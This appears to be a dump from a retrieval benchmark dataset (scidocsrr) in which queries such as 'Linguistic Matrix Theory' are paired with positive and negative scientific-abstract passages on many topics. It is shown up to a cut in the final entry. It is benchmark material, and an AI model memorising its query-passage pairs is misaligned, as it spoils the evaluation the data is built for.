query_id
stringlengths 32
32
| query
stringlengths 5
5.38k
| positive_passages
listlengths 1
23
| negative_passages
listlengths 4
100
| subset
stringclasses 7
values |
---|---|---|---|---|
0690d3ee6da187505b7265b06869e858 | Linguistic Matrix Theory | [
{
"docid": "0f2bca5d7ff30c82150611a75d41e029",
"text": "This short paper summarizes a faithful implementation of the categorical framework of Coecke et al. (2010), the aim of which is to provide compositionality in distributional models of lexical semantics. Based on Frobenius Algebras, our method enable us to (1) have a unifying meaning space for phrases and sentences of different structure and word vectors, (2) stay faithful to the linguistic types suggested by the underlying type-logic, and (3) perform the concrete computations in lower dimensions by reducing the space complexity. We experiment with two different parameters of the model and apply the setting to a verb disambiguation and a term/definition classification task with promising results.",
"title": ""
},
{
"docid": "c256a2ba1e7a81a6be271f7b14fe311b",
"text": "We present a model for compositional distributional semantics related to the framework of Coecke et al. (2010), and emulating formal semantics by representing functions as tensors and arguments as vectors. We introduce a new learning method for tensors, generalising the approach of Baroni and Zamparelli (2010). We evaluate it on two benchmark data sets, and find it to outperform existing leading methods. We argue in our analysis that the nature of this learning method also renders it suitable for solving more subtle problems compositional distributional models might face.",
"title": ""
},
{
"docid": "434400e864e30a25b87cdd0e4490f33c",
"text": "We propose a mathematical framework for a unification of the distributional theory of meaning in terms of vector space models, and a compositional theory for grammatical types, for which we rely on the algebra of Pregroups, introduced by Lambek. This mathematical framework enables us to compute the meaning of a well-typed sentence from the meanings of its constituents. Concretely, the type reductions of Pregroups are ‘lifted’ to morphisms in a category, a procedure that transforms meanings of constituents into a meaning of the (well-typed) whole. Importantly, meanings of whole sentences live in a single space, independent of the grammatical structure of the sentence. Hence the inner-product can be used to compare meanings of arbitrary sentences, as it is for comparing the meanings of words in the distributional model. The mathematical structure we employ admits a purely diagrammatic calculus which exposes how the information flows between the words in a sentence in order to make up the meaning of the whole sentence. A variation of our ‘categorical model’ which involves constraining the scalars of the vector spaces to the semiring of Booleans results in a Montague-style Boolean-valued semantics.",
"title": ""
}
] | [
{
"docid": "f0926d59f842d8f32f072b9325dddd84",
"text": "Smart home IoT devices have been more prevalent than ever before but the relevant security considerations fail to keep up with due to device and technology heterogeneity and resource constraints, making IoT systems susceptible to various attacks. In this paper, we propose a novel graph-based mechanism to identify the vulnerabilities in communication of IoT devices for smart home systems. Our approach takes one or more packet capture files as inputs to construct a traffic graph by passing the captured messages, identify the correlated subgraphs by examining the attribute-value pairs associated with each message, and then quantify their vulnerabilities based on the sensitivity levels of different keywords. To test the effectiveness of our approach, we setup a smart home system that can control a smart bulb LB100 via either the smartphone APP for LB100 or the Google Home speaker. We collected and analyzed 58,714 messages and exploited 6 vulnerable correlated sub graphs, based on which we implemented 6 attack cases that can be easily reproduced by attackers with little knowledge of IoT. This study is novel as our approach takes only the collected traffic files as inputs without requiring the knowledge of the device firmware while being able to identify new vulnerabilities. With this approach, we won the third prize out of 20 teams in a hacking competition.",
"title": ""
},
{
"docid": "f2730c0a11e5c3d436c777e51f2142b4",
"text": "The proliferation and ubiquity of temporal data across many disciplines has generated substantial interest in the analysis and mining of time series. Clustering is one of the most popular data-mining methods, not only due to its exploratory power but also because it is often a preprocessing step or subroutine for other techniques. In this article, we present k-Shape and k-MultiShapes (k-MS), two novel algorithms for time-series clustering. k-Shape and k-MS rely on a scalable iterative refinement procedure. As their distance measure, k-Shape and k-MS use shape-based distance (SBD), a normalized version of the cross-correlation measure, to consider the shapes of time series while comparing them. Based on the properties of SBD, we develop two new methods, namely ShapeExtraction (SE) and MultiShapesExtraction (MSE), to compute cluster centroids that are used in every iteration to update the assignment of time series to clusters. k-Shape relies on SE to compute a single centroid per cluster based on all time series in each cluster. In contrast, k-MS relies on MSE to compute multiple centroids per cluster to account for the proximity and spatial distribution of time series in each cluster. To demonstrate the robustness of SBD, k-Shape, and k-MS, we perform an extensive experimental evaluation on 85 datasets against state-of-the-art distance measures and clustering methods for time series using rigorous statistical analysis. SBD, our efficient and parameter-free distance measure, achieves similar accuracy to Dynamic Time Warping (DTW), a highly accurate but computationally expensive distance measure that requires parameter tuning. For clustering, we compare k-Shape and k-MS against scalable and non-scalable partitional, hierarchical, spectral, density-based, and shapelet-based methods, with combinations of the most competitive distance measures. k-Shape outperforms all scalable methods in terms of accuracy. Furthermore, k-Shape also outperforms all non-scalable approaches, with one exception, namely k-medoids with DTW, which achieves similar accuracy. However, unlike k-Shape, this approach requires tuning of its distance measure and is significantly slower than k-Shape. k-MS performs similarly to k-Shape in comparison to rival methods, but k-MS is significantly more accurate than k-Shape. Beyond clustering, we demonstrate the effectiveness of k-Shape to reduce the search space of one-nearest-neighbor classifiers for time series. Overall, SBD, k-Shape, and k-MS emerge as domain-independent, highly accurate, and efficient methods for time-series comparison and clustering with broad applications.",
"title": ""
},
{
"docid": "d03fa0dcb14dc19ef5eca5a564b70238",
"text": "Many requirements documents are written in natural language (NL). However, with the flexibility of NL comes the risk of introducing unwanted ambiguities in the requirements and misunderstandings between stakeholders. In this paper, we describe an automated approach to identify potentially nocuous ambiguity, which occurs when text is interpreted differently by different readers. We concentrate on anaphoric ambiguity, which occurs when readers may disagree on how pronouns should be interpreted. We describe a number of heuristics, each of which captures information that may lead a reader to favor a particular interpretation of the text. We use these heuristics to build a classifier, which in turn predicts the degree to which particular interpretations are preferred. We collected multiple human judgements on the interpretation of requirements exhibiting anaphoric ambiguity and showed how the distribution of these judgements can be used to assess whether a particular instance of ambiguity is nocuous. Given a requirements document written in natural language, our approach can identify sentences that contain anaphoric ambiguity, and use the classifier to alert the requirements writer of text that runs the risk of misinterpretation. We report on a series of experiments that we conducted to evaluate the performance of the automated system we developed to support our approach. The results show that the system achieves high recall with a consistent improvement on baseline precision subject to some ambiguity tolerance levels, allowing us to explore and highlight realistic and potentially problematic ambiguities in actual requirements documents.",
"title": ""
},
{
"docid": "094b1b2ceb20cf9c97ab42a9399a6dd8",
"text": "This paper proposes an agricultural environment monitoring server system for monitoring information concerning an outdoors agricultural production environment utilizing Wireless Sensor Network (WSN) technology. The proposed agricultural environment monitoring server system collects environmental and soil information on the outdoors through WSN-based environmental and soil sensors, collects image information through CCTVs, and collects location information using GPS modules. This collected information is converted into a database through the agricultural environment monitoring server consisting of a sensor manager, which manages information collected from the WSN sensors, an image information manager, which manages image information collected from CCTVs, and a GPS manager, which processes location information of the agricultural environment monitoring server system, and provides it to producers. In addition, a solar cell-based power supply is implemented for the server system so that it could be used in agricultural environments with insufficient power infrastructure. This agricultural environment monitoring server system could even monitor the environmental information on the outdoors remotely, and it could be expected that the use of such a system could contribute to increasing crop yields and improving quality in the agricultural field by supporting the decision making of crop producers through analysis of the collected information.",
"title": ""
},
{
"docid": "6a86c166d32a7ecaec05cb8e6318ae5b",
"text": "Nowadays artificial neural networks are widely used to accurately classify and recognize patterns. An interesting application area is the Internet of Things (IoT), where physical things are connected to the Internet, and generate a huge amount of sensor data that can be used for a myriad of new, pervasive applications. Neural networks' ability to comprehend unstructured data make them a useful building block for such IoT applications. As neural networks require a lot of processing power, especially during the training phase, these are most often deployed in a cloud environment, or on specialized servers with dedicated GPU hardware. However, for IoT applications, sending all raw data to a remote back-end might not be feasible, taking into account the high and variable latency to the cloud, or could lead to issues concerning privacy. In this paper the DIANNE middleware framework is presented that is optimized for single sample feed-forward execution and facilitates distributing artificial neural networks across multiple IoT devices. The modular approach enables executing neural network components on a large number of heterogeneous devices, allowing us to exploit the local compute power at hand, and mitigating the need for a large server-side infrastructure at runtime.",
"title": ""
},
{
"docid": "a3afecbe3dad37294175a96f78b070d6",
"text": "Achieving an appropriate balance between training and competition stresses and recovery is important in maximising the performance of athletes. A wide range of recovery modalities are now used as integral parts of the training programmes of elite athletes to help attain this balance. This review examined the evidence available as to the efficacy of these recovery modalities in enhancing between-training session recovery in elite athletes. Recovery modalities have largely been investigated with regard to their ability to enhance the rate of blood lactate removal following high-intensity exercise or to reduce the severity and duration of exercise-induced muscle injury and delayed onset muscle soreness (DOMS). Neither of these reflects the circumstances of between-training session recovery in elite athletes. After high-intensity exercise, rest alone will return blood lactate to baseline levels well within the normal time period between the training sessions of athletes. The majority of studies examining exercise-induced muscle injury and DOMS have used untrained subjects undertaking large amounts of unfamiliar eccentric exercise. This model is unlikely to closely reflect the circumstances of elite athletes. Even without considering the above limitations, there is no substantial scientific evidence to support the use of the recovery modalities reviewed to enhance the between-training session recovery of elite athletes. Modalities reviewed were massage, active recovery, cryotherapy, contrast temperature water immersion therapy, hyperbaric oxygen therapy, nonsteroidal anti-inflammatory drugs, compression garments, stretching, electromyostimulation and combination modalities. Experimental models designed to reflect the circumstances of elite athletes are needed to further investigate the efficacy of various recovery modalities for elite athletes. Other potentially important factors associated with recovery, such as the rate of post-exercise glycogen synthesis and the role of inflammation in the recovery and adaptation process, also need to be considered in this future assessment.",
"title": ""
},
{
"docid": "63b08fb1b6c01b4a78b02dc57eaff7a4",
"text": "Multi-person articulated pose tracking in unconstrained videos is an important while challenging problem. In this paper, going along the road of top-down approaches, we propose a decent and efficient pose tracker based on pose flows. First, we design an online optimization framework to build the association of cross-frame poses and form pose flows (PF-Builder). Second, a novel pose flow non-maximum suppression (PFNMS) is designed to robustly reduce redundant pose flows and re-link temporal disjoint ones. Extensive experiments show that our method significantly outperforms best reported results on two standard Pose Tracking datasets ( [13] and [8]) by 13 mAP 25 MOTA and 6 mAP 3 MOTA respectively. Moreover, in the case of working on detected poses in individual frames, the extra computation of pose tracker is very minor, guaranteeing online 10FPS tracking. Our source codes are made publicly available at https://github.com/YuliangXiu/PoseFlow.",
"title": ""
},
{
"docid": "626c274978a575cd06831370a6590722",
"text": "The honeypot has emerged as an effective tool to provide insights into new attacks and exploitation trends. However, a single honeypot or multiple independently operated honeypots only provide limited local views of network attacks. Coordinated deployment of honeypots in different network domains not only provides broader views, but also create opportunities of early network anomaly detection, attack correlation, and global network status inference. Unfortunately, coordinated honeypot operation require close collaboration and uniform security expertise across participating network domains. The conflict between distributed presence and uniform management poses a major challenge in honeypot deployment and operation. To address this challenge, we present Collapsar, a virtual machine-based architecture for network attack capture and detention. A Collapsar center hosts and manages a large number of high-interaction virtual honeypots in a local dedicated network. To attackers, these honeypots appear as real systems in their respective production networks. Decentralized logical presence of honeypots provides a wide diverse view of network attacks, while the centralized operation enables dedicated administration and convenient event correlation, eliminating the need for honeypot expertise in every production network domain. Collapsar realizes the traditional honeyfarm vision as well as our new reverse honeyfarm vision, where honeypots act as vulnerable clients exploited by real-world malicious servers. We present the design, implementation, and evaluation of a Collapsar prototype. Our experiments with a number of real-world attacks demonstrate the effectiveness and practicality of Collapsar. © 2006 Elsevier Inc. All rights reserved.",
"title": ""
},
{
"docid": "9876e4298f674a617f065f348417982a",
"text": "On the basis of medical officers diagnosis, thirty three (N = 33) hypertensives, aged 35-65 years, from Govt. General Hospital, Pondicherry, were examined with four variables viz, systolic and diastolic blood pressure, pulse rate and body weight. The subjects were randomly assigned into three groups. The exp. group-I underwent selected yoga practices, exp. group-II received medical treatment by the physician of the said hospital and the control group did not participate in any of the treatment stimuli. Yoga imparted in the morning and in the evening with 1 hr/session. day-1 for a total period of 11-weeks. Medical treatment comprised drug intake every day for the whole experimental period. The result of pre-post test with ANCOVA revealed that both the treatment stimuli (i.e., yoga and drug) were effective in controlling the variables of hypertension.",
"title": ""
},
{
"docid": "05d91e98965f9c246d9485d5046c0556",
"text": "This paper addresses the problem of learning tòdivide and conquer' by meaningful hierarchical adaptive decomposition of temporal sequences. This problem is relevant for time-series analysis as well as for goal-directed learning, particularily if event sequences tend to have hierarchical temporal structure. The rst neural systems for recursively chunking sequences are described. These systems are based on a principle called thèprinciple of history compression'. This principle essentially says: As long as a predictor is able to predict future environmental inputs from previous ones, no additional knowledge can be obtained by observing these inputs in reality. Only unexpected inputs deserve attention. A focus is on a class of 2-network systems which try to collapse a self-organizing (possibly multi-level) hierarchy of temporal predictors into a single recurrent network. Only those input events that were not expected by the rst recurrent net are transferred to the second recurrent net. Therefore the second net receives a reduced discription of the input history. It tries to develop internal representations for`higher-level' temporal structure. These internal representations in turn serve to create additional training signals for the rst net, thus helping the rst net to create longer and longer`chunks' for the second net. Experiments show that chunking systems can be superior to the conventional training algorithms for recurrent nets. 1 OUTLINE Section 2 motivates the search for sequence-composing systems by describing major drawbacks of`conventional' learning algorithms for recurrent networks with time-varying inputs and outputs. Section 3 describes a simple observation which is essential for the rest of this paper: It describes thèprinciple of history compression'. This principle essentially says: As long as a predictor is able to predict future environmental inputs from previous ones, no additional knowledge can be obtained by observing these inputs in reality. Only unexpected inputs deserve attention. This principle is of particular interest if typical event sequences have hierarchical temporal structure. Basic schemes for constructing sequence chunking systems based on the principle of history compression are described. Section 4 then describes on-line and o-line versions of a particular 2-network chunking system which tries to collapse a self-organizing (possibly multi-level) predictor hierarchy into a single recurrent network (the automatizer). The idea is to feed everything that is unexpected into a `higher-level' recurrent net (the chunker). Since the expected things can be derived from the unexpected things by the automatizer, the chunker is fed with a reduced description of the input history. The chunker has a …",
"title": ""
},
{
"docid": "7588252227f9faef2212962e606cc992",
"text": "OBJECTIVE\nThis study examines the reasons for not using any method of contraception as well as reasons for not using modern methods of contraception, and factors associated with the future intention to use different types of contraceptives in India and its selected states, namely Uttar Pradesh, Assam and West Bengal.\n\n\nMETHODS\nData from the third wave of District Level Household and Facility Survey, 2007-08 were used. Bivariate as well as logistic regression analyses were performed to fulfill the study objective.\n\n\nRESULTS\nPostpartum amenorrhea and breastfeeding practices were reported as the foremost causes for not using any method of contraception. Opposition to use, health concerns and fear of side effects were reported to be major hurdles in the way of using modern methods of contraception. Results from logistic regression suggest considerable variation in explaining the factors associated with future intention to use contraceptives.\n\n\nCONCLUSION\nPromotion of health education addressing the advantages of contraceptive methods and eliminating apprehension about the use of these methods through effective communication by community level workers is the need of the hour.",
"title": ""
},
{
"docid": "5906d20bea1c95399395d045f84f11c9",
"text": "Constructive interference (CI) enables concurrent transmissions to interfere non-destructively, so as to enhance network concurrency. In this paper, we propose deliberate synchronized constructive interference (Disco), which ensures concurrent transmissions of an identical packet to synchronize more precisely than traditional CI. Disco envisions concurrent transmissions to positively interfere at the receiver, and potentially allows orders of magnitude reductions in energy consumption and improvements in link quality. We also theoretically introduce a sufficient condition to construct Disco with IEEE 802.15.4 radio for the first time. Moreover, we propose Triggercast, a distributed middleware service, and show it is feasible to generate Disco on real sensor network platforms like TMote Sky. To synchronize transmissions of multiple senders at the chip level, Triggercast effectively compensates propagation and radio processing delays, and has 95th percentile synchronization errors of at most 250 ns. Triggercast also intelligently decides which co-senders to participate in simultaneous transmissions, and aligns their transmission time to maximize the overall link Packet Reception Ratio (PRR), under the condition of maximal system robustness. Extensive experiments in real testbeds demonstrate that Triggercast significantly improves PRR from 5 to 70 percent with seven concurrent senders. We also demonstrate that Triggercast provides 1.3χ PRR performance gains in average, when it is integrated with existing data forwarding protocols.",
"title": ""
},
{
"docid": "c03bf622dde1bd81c0eb83a87e1f9924",
"text": "Image-schemas (e.g. CONTAINER, PATH, FORCE) are pervasive skeletal patterns of a preconceptual nature which arise from everyday bodily and social experiences and which enable us to mentally structure perceptions and events (Johnson 1987; Lakoff 1987, 1989). Within Cognitive Linguistics, these recurrent non-propositional models are taken to unify the different sensory and motor experiences in which they manifest themselves in a direct way and, most significantly, they may be metaphorically projected from the realm of the physical to other more abstract domains. In this paper, we intend to provide a cognitively plausible account of the OBJECT image-schema, which has received rather contradictory treatments in the literature. The OBJECT schema is experientially grounded in our everyday interaction with our own bodies and with other discrete entities. In the light of existence-related language (more specifically, linguistic expressions concerning the creation and destruction of both physical and abstract entities), it is argued that the OBJECT image-schema may be characterized as a basic image-schema, i.e. one that functions as a guideline for the activation of additional models, including other dependent image-schematic patterns (LINK, PART-WHOLE, CENTREPERIPHERY, etc.) which highlight various facets of the higher-level schema.",
"title": ""
},
{
"docid": "f4bf4be69ea3f3afceca056e2b5b8102",
"text": "In this paper we present a conversational dialogue system, Ch2R (Chinese Chatter Robot) for online shopping guide, which allows users to inquire about information of mobile phone in Chinese. The purpose of this paper is to describe our development effort in terms of the underlying human language technologies (HLTs) as well as other system issues. We focus on a mixed-initiative conversation mechanism for interactive shopping guide combining initiative guiding and question understanding. We also present some evaluation on the system in mobile phone shopping guide domain. Evaluation results demonstrate the efficiency of our approach.",
"title": ""
},
{
"docid": "36ea5beaaa58f781eaff21a372dbf6cf",
"text": "With the increasing scale of deployment of Internet of Things (IoT), concerns about IoT security have become more urgent. In particular, memory corruption attacks play a predominant role as they allow remote compromise of IoT devices. Control-flow integrity (CFI) is a promising and generic defense technique against these attacks. However, given the nature of IoT deployments, existing protection mechanisms for traditional computing environments (including CFI) need to be adapted to the IoT setting. In this paper, we describe the challenges of enabling CFI on microcontroller (MCU) based IoT devices. We then present CaRE, the first interrupt-aware CFI scheme for low-end MCUs. CaRE uses a novel way of protecting the CFI metadata by leveraging TrustZone-M security extensions introduced in the ARMv8-M architecture. Its binary instrumentation approach preserves the memory layout of the target MCU software, allowing pre-built bare-metal binary code to be protected by CaRE. We describe our implementation on a Cortex-M Prototyping System and demonstrate that CaRE is secure while imposing acceptable performance and memory impact.",
"title": ""
},
{
"docid": "ddb804eec29ebb8d7f0c80223184305a",
"text": "Near Field Communication (NFC) enables physically proximate devices to communicate over very short ranges in a peer-to-peer manner without incurring complex network configuration overheads. However, adoption of NFC-enabled applications has been stymied by the low levels of penetration of NFC hardware. In this paper, we address the challenge of enabling NFC-like capability on the existing base of mobile phones. To this end, we develop Dhwani, a novel, acoustics-based NFC system that uses the microphone and speakers on mobile phones, thus eliminating the need for any specialized NFC hardware. A key feature of Dhwani is the JamSecure technique, which uses self-jamming coupled with self-interference cancellation at the receiver, to provide an information-theoretically secure communication channel between the devices. Our current implementation of Dhwani achieves data rates of up to 2.4 Kbps, which is sufficient for most existing NFC applications.",
"title": ""
},
{
"docid": "155de33977b33d2f785fd86af0aa334f",
"text": "Model-based analysis tools, built on assumptions and simplifications, are difficult to handle smart grids with data characterized by volume, velocity, variety, and veracity (i.e., 4Vs data). This paper, using random matrix theory (RMT), motivates data-driven tools to perceive the complex grids in high-dimension; meanwhile, an architecture with detailed procedures is proposed. In algorithm perspective, the architecture performs a high-dimensional analysis and compares the findings with RMT predictions to conduct anomaly detections. Mean spectral radius (MSR), as a statistical indicator, is defined to reflect the correlations of system data in different dimensions. In management mode perspective, a group-work mode is discussed for smart grids operation. This mode breaks through regional limitations for energy flows and data flows, and makes advanced big data analyses possible. For a specific large-scale zone-dividing system with multiple connected utilities, each site, operating under the group-work mode, is able to work out the regional MSR only with its own measured/simulated data. The large-scale interconnected system, in this way, is naturally decoupled from statistical parameters perspective, rather than from engineering models perspective. Furthermore, a comparative analysis of these distributed MSRs, even with imperceptible different raw data, will produce a contour line to detect the event and locate the source. It demonstrates that the architecture is compatible with the block calculation only using the regional small database; beyond that, this architecture, as a data-driven solution, is sensitive to system situation awareness, and practical for real large-scale interconnected systems. Five case studies and their visualizations validate the designed architecture in various fields of power systems. To our best knowledge, this paper is the first attempt to apply big data technology into smart grids.",
"title": ""
},
{
"docid": "64fbd2207a383bc4b04c66e8ee867922",
"text": "Ultra compact, short pulse, high voltage, high current pulsers are needed for a variety of non-linear electrical and optical applications. With a fast risetime and short pulse width, these drivers are capable of producing sub-nanosecond electrical and thus optical pulses by gain switching semiconductor laser diodes. Gain-switching of laser diodes requires a sub-nanosecond pulser capable of driving a low output impedance (5 /spl Omega/ or less). Optical pulses obtained had risetimes as fast as 20 ps. The designed pulsers also could be used for triggering photo-conductive semiconductor switches (PCSS), gating high speed optical imaging systems, and providing electrical and optical sources for fast transient sensor applications. Building on concepts from Lawrence Livermore National Laboratory, the development of pulsers based on solid state avalanche transistors was adapted to drive low impedances. As each successive stage is avalanched in the circuit, the amount of overvoltage increases, increasing the switching speed and improving the turn on time of the output pulse at the final stage. The output of the pulser is coupled into the load using a Blumlein configuration.",
"title": ""
},
{
"docid": "1b8394f45b88f2474f72c500fc0a6fe4",
"text": "User-Generated live video streaming systems are services that allow anybody to broadcast a video stream over the Internet. These Over-The-Top services have recently gained popularity, in particular with e-sport, and can now be seen as competitors of the traditional cable TV. In this paper, we present a dataset for further works on these systems. This dataset contains data on the two main user-generated live streaming systems: Twitch and the live service of YouTube. We got three months of traces of these services from January to April 2014. Our dataset includes, at every five minutes, the identifier of the online broadcaster, the number of people watching the stream, and various other media information. In this paper, we introduce the dataset and we make a preliminary study to show the size of the dataset and its potentials. We first show that both systems generate a significant traffic with frequent peaks at more than 1 Tbps. Thanks to more than a million unique uploaders, Twitch is in particular able to offer a rich service at anytime. Our second main observation is that the popularity of these channels is more heterogeneous than what have been observed in other services gathering user-generated content.",
"title": ""
}
] | scidocsrr |
d6c5b61fee6f1ecdcdecd0efeffc2082 | Abnormality detection using deep neural networks with robust quasi-norm autoencoding and semi-supervised learning | [
{
"docid": "743424b3b532b16f018e92b2563458d5",
"text": "We consider the problem of finding a few representatives for a dataset, i.e., a subset of data points that efficiently describes the entire dataset. We assume that each data point can be expressed as a linear combination of the representatives and formulate the problem of finding the representatives as a sparse multiple measurement vector problem. In our formulation, both the dictionary and the measurements are given by the data matrix, and the unknown sparse codes select the representatives via convex optimization. In general, we do not assume that the data are low-rank or distributed around cluster centers. When the data do come from a collection of low-rank models, we show that our method automatically selects a few representatives from each low-rank model. We also analyze the geometry of the representatives and discuss their relationship to the vertices of the convex hull of the data. We show that our framework can be extended to detect and reject outliers in datasets, and to efficiently deal with new observations and large datasets. The proposed framework and theoretical foundations are illustrated with examples in video summarization and image classification using representatives.",
"title": ""
},
{
"docid": "15ef258e08dcc0fe0298c089fbf5ae1c",
"text": "In this paper we report the set-up and results of the Multimodal Brain Tumor Image Segmentation Benchmark (BRATS) organized in conjunction with the MICCAI 2012 and 2013 conferences. Twenty state-of-the-art tumor segmentation algorithms were applied to a set of 65 multi-contrast MR scans of low- and high-grade glioma patients - manually annotated by up to four raters - and to 65 comparable scans generated using tumor image simulation software. Quantitative evaluations revealed considerable disagreement between the human raters in segmenting various tumor sub-regions (Dice scores in the range 74%-85%), illustrating the difficulty of this task. We found that different algorithms worked best for different sub-regions (reaching performance comparable to human inter-rater variability), but that no single algorithm ranked in the top for all sub-regions simultaneously. Fusing several good algorithms using a hierarchical majority vote yielded segmentations that consistently ranked above all individual algorithms, indicating remaining opportunities for further methodological improvements. The BRATS image data and manual annotations continue to be publicly available through an online evaluation system as an ongoing benchmarking resource.",
"title": ""
}
] | [
{
"docid": "fb83d0d3ea08cc1e21a1a22ba810dca0",
"text": "conditions. The effect of the milk run logistics on the reduction of CO2 is also discussed. The promotion of Milk-Run logistics can be highly evaluated from the viewpoint of environmental policy.",
"title": ""
},
{
"docid": "523852d2c5465f514c2f47d273b84667",
"text": "For the State Farm Photo Classification Kaggle Challenge, we use two different Convolutional Neural Network models to classify pictures of drivers in their cars. The first is a model trained from scratch on the provided dataset, and the other is a model that was first pretrained on the ImageNet dataset and then underwent transfer learning on the provided StateFarm dataset. With the first approach, we achieved a validation accuracy of 10.9%, which is not much better than random. However, with the second approach, we achieved an accuracy of 21.1%. Finally, we explore ways to make these models better based on past models and training techniques.",
"title": ""
},
{
"docid": "19350a76398e0054be44c73618cdfb33",
"text": "An emerging class of data-intensive applications involve the geographically dispersed extraction of complex scientific information from very large collections of measured or computed data. Such applications arise, for example, in experimental physics, where the data in question is generated by accelerators, and in simulation science, where the data is generated by supercomputers. So-called Data Grids provide essential infrastructure for such applications, much as the Internet provides essential services for applications such as e-mail and the Web. We describe here two services that we believe are fundamental to any Data Grid: reliable, high-speed transport and replica management. Our high-speed transport service, GridFTP, extends the popular FTP protocol with new features required for Data Grid applications, such as striping and partial file access. Our replica management service integrates a replica catalog with GridFTP transfers to provide for the creation, registration, location, and management of dataset replicas. We present the design of both services and also preliminary performance results. Our implementations exploit security and other services provided by the Globus Toolkit.",
"title": ""
},
{
"docid": "b85330c2d0816abe6f28fd300e5f9b75",
"text": "This paper presents a novel dual polarized planar aperture antenna using the low-temperature cofired ceramics technology to realize a novel antenna-in-package for a 60-GHz CMOS differential transceiver chip. Planar aperture antenna technology ensures high gain and wide bandwidth. Differential feeding is adopted to be compatible with the chip. Dual polarization makes the antenna function as a pair of single polarized antennas but occupies much less area. The antenna is ±45° dual polarized, and each polarization acts as either a transmitting (TX) or receiving (RX) antenna. This improves the signal-to-noise ratio of the wireless channel in a point-to-point communication, because the TX/RX polarization of one antenna is naturally copolarized with the RX/TX polarization of the other antenna. A prototype of the proposed antenna is designed, fabricated, and measured, whose size is 12 mm × 12 mm × 1.128 mm (2.4λ0 × 2.4λ0 × 0.226λ0). The measurement shows that the -10 dB impedance bandwidth covers the entire 60 GHz unlicensed band (57-64 GHz) for both polarizations. Within the bandwidth, the isolation between the ports of the two polarizations is better than 26 dB, and the gain is higher than 10 dBi with a peak of around 12 dBi for both polarizations.",
"title": ""
},
{
"docid": "505c4be0a257d5b935496f66b20a7765",
"text": "Video summarization has unprecedented importance to help us digest, browse, and search today's ever-growing video collections. We propose a novel subset selection technique that leverages supervision in the form of humancreated summaries to perform automatic keyframe-based video summarization. The main idea is to nonparametrically transfer summary structures from annotated videos to unseen test videos. We show how to extend our method to exploit semantic side information about the video's category/ genre to guide the transfer process by those training videos semantically consistent with the test input. We also show how to generalize our method to subshot-based summarization, which not only reduces computational costs but also provides more flexible ways of defining visual similarity across subshots spanning several frames. We conduct extensive evaluation on several benchmarks and demonstrate promising results, outperforming existing methods in several settings.",
"title": ""
},
{
"docid": "59ddabc255d07fe6b8fb13082c8dd62d",
"text": "Mambo is a full-system simulator for modeling PowerPC-based systems. It provides building blocks for creating simulators that range from purely functional to timing-accurate. Functional versions support fast emulation of individual PowerPC instructions and the devices necessary for executing operating systems. Timing-accurate versions add the ability to account for device timing delays, and support the modeling of the PowerPC processor microarchitecture. We describe our experience in implementing the simulator and its uses within IBM to model future systems, support early software development, and design new system software.",
"title": ""
},
{
"docid": "11e9bdfbdcc7718878c4a87c894964eb",
"text": "Detecting topics from Twitter streams has become an important task as it is used in various fields including natural disaster warning, users opinion assessment, and traffic prediction. In this article, we outline different types of topic detection techniques and evaluate their performance. We categorize the topic detection techniques into five categories which are clustering, frequent pattern mining, Exemplar-based, matrix factorization, and probabilistic models. For clustering techniques, we discuss and evaluate nine different techniques which are sequential k-means, spherical k-means, Kernel k-means, scalable Kernel k-means, incremental batch k-means, DBSCAN, spectral clustering, document pivot clustering, and Bngram. Moreover, for matrix factorization techniques, we analyze five different techniques which are sequential Latent Semantic Indexing (LSI), stochastic LSI, Alternating Least Squares (ALS), Rank-one Downdate (R1D), and Column Subset Selection (CSS). Additionally, we evaluate several other techniques in the frequent pattern mining, Exemplar-based, and probabilistic model categories. Results on three Twitter datasets show that Soft Frequent Pattern Mining (SFM) and Bngram achieve the best term precision, while CSS achieves the best term recall and topic recall in most of the cases. Moreover, Exemplar-based topic detection obtains a good balance between the term recall and term precision, while achieving a good topic recall and running time.",
"title": ""
},
{
"docid": "c0610eab7d3825d6b12959fedd9656ea",
"text": "We introduce a new deep convolutional neural network, CrescendoNet, by stacking simple building blocks without residual connections. Each Crescendo block contains independent convolution paths with increased depths. The numbers of convolution layers and parameters are only increased linearly in Crescendo blocks. In experiments, CrescendoNet with only 15 layers outperforms almost all networks without residual connections on benchmark datasets, CIFAR10, CIFAR100, and SVHN. Given sufficient amount of data as in SVHN dataset, CrescendoNet with 15 layers and 4.1M parameters can match the performance of DenseNet-BC with 250 layers and 15.3M parameters. CrescendoNet provides a new way to construct high performance deep convolutional neural networks with simple network architecture. Moreover, by investigating a various combination of subnetworks in CrescendoNet, we note that the high performance of CrescendoNet may come from its implicit ensemble behavior, which gives CrescendoNet an anytime classification property. Furthermore, the independence between paths in CrescendoNet allows us to introduce a new path-wise training procedure, which can reduce the memory needed for training.",
"title": ""
},
{
"docid": "c697ce69b5ba77cce6dce93adaba7ee0",
"text": "Online social networks play a major role in modern societies, and they have shaped the way social relationships evolve. Link prediction in social networks has many potential applications such as recommending new items to users, friendship suggestion and discovering spurious connections. Many real social networks evolve the connections in multiple layers (e.g. multiple social networking platforms). In this article, we study the link prediction problem in multiplex networks. As an example, we consider a multiplex network of Twitter (as a microblogging service) and Foursquare (as a location-based social network). We consider social networks of the same users in these two platforms and develop a meta-path-based algorithm for predicting the links. The connectivity information of the two layers is used to predict the links in Foursquare network. Three classical classifiers (naive Bayes, support vector machines (SVM) and K-nearest neighbour) are used for the classification task. Although the networks are not highly correlated in the layers, our experiments show that including the cross-layer information significantly improves the prediction performance. The SVM classifier results in the best performance with an average accuracy of 89%.",
"title": ""
},
{
"docid": "0169f6c2eee1710d2ccd1403116da68f",
"text": "A resonant snubber is described for voltage-source inverters, current-source inverters, and self-commutated frequency changers. The main self-turn-off devices have shunt capacitors directly across them. The lossless resonant snubber described avoids trapping energy in a converter circuit where high dynamic stresses at both turn-on and turn-off are normally encountered. This is achieved by providing a temporary parallel path through a small ordinary thyristor (or other device operating in a similar node) to take over the high-stress turn-on duty from the main gate turn-off (GTO) or power transistor, in a manner that leaves no energy trapped after switching.<<ETX>>",
"title": ""
},
{
"docid": "e6dabfc7165883e77c4cf6772ed59ee4",
